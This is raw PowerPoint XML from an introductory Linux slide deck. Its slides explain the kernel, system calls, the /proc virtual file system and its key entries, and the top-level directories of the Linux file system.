              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The core of the system’s software that abstracts the underlying hardware from the software to provide a running environment for application software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System calls are used to exchange information with the Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resource manager between hardware and software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Arbitrates access to resources between competing users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monolithic Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel information can be found in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not a real file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virtual file system </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key Linux Components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;98;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564262" y="5842000"/>
            <a:ext cx="4119738" cy="320504"/>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2710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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564262" y="4642704"/>
            <a:ext cx="4119738" cy="1865586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key Linux Components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;98;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564262" y="5842000"/>
            <a:ext cx="4119738" cy="320504"/>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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The core of the system’s software that abstracts the underlying hardware from the software to provide a running environment for application software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System calls are used to exchange information with the Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resource manager between hardware and software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Arbitrates access to resources between competing users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monolithic Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel information can be found in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not a real file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virtual file system </a:t>
            </a:r>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3971822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z="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> file system was created to improve communication between users and the Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>All files correspond either to a function or set of variables in the Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For example … /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>kcore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is a point to RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Reading /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>kcore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> is like reading raw contents of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> files have read-write mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Key /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> directories:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>cpuinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>     /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ioports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>       /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>meminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/stat             /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/swaps		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/interrupts  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/mounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>/proc Directory</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6722358" y="3541552"/>
            <a:ext cx="5274953" cy="2849726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="6122922"/>
            <a:ext cx="7790058" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.tecmint.com/exploring-proc-file-system-in-linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39246190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z="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> file system was created to improve communication between users and the Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>All files correspond either to a function or set of variables in the Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For example … /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>kcore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is a point to RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Reading /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>kcore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> is like reading raw contents of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> files have read-write mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Key /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> directories:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>cpuinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>     /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ioports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>       /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>meminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/stat             /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/swaps		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/interrupts  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/mounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>/proc Directory</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6722358" y="3541552"/>
            <a:ext cx="5274953" cy="2849726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2346128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Linux File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973281" y="3271260"/>
            <a:ext cx="1387781" cy="1315754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Root Directory</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Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4089985" y="1502115"/>
            <a:ext cx="1501647" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>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/bin/</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>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/boot/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>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/dev/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>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etc</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27" name="Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>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/home/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
